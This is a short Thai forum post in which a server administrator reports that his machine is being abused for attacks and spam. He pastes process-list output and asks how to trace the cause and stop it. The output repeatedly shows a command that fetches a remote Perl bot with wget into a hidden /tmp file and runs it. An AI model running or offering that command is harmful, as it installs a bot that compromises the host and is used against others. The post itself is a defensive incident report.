คือมันจะมี พวกชอบเอาเครื่องผมไป ยิงชาวบ้านบ้าง
เอามาโหลด หรือ ส่งเมล์ บ้าง อะไรประมาณนี้นะครับ
ตัวอย่างวันนี้
1823 ? S 0:00 sh -c wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2; perl /tmp/.ayan2; touch /tmp/.unb
1824 ? S 0:00 wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2
1846 ? S 0:00 sh -c wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2; perl /tmp/.ayan2; touch /tmp/.unb
1847 ? S 0:00 wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2
1856 ? S 0:00 sh -c wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2; perl /tmp/.ayan2; touch /tmp/.unb
1857 ? S 0:00 wget http://www.yogiplanet.com/linuxdaybot.txt -O /tmp/.ayan2
คือมันเอาไปเก็บไว้ที่ tmp นะครับ
เราจะตามได้ไหมว่าเป็นที่ ลูกค้าเรา ฝั่ง script เอง หรือว่า คนนอก เอามาใส่
มีทางกันไหมครับ มันขึ้น perl ใช้งานค่อนข้างหนักเหมือนกัน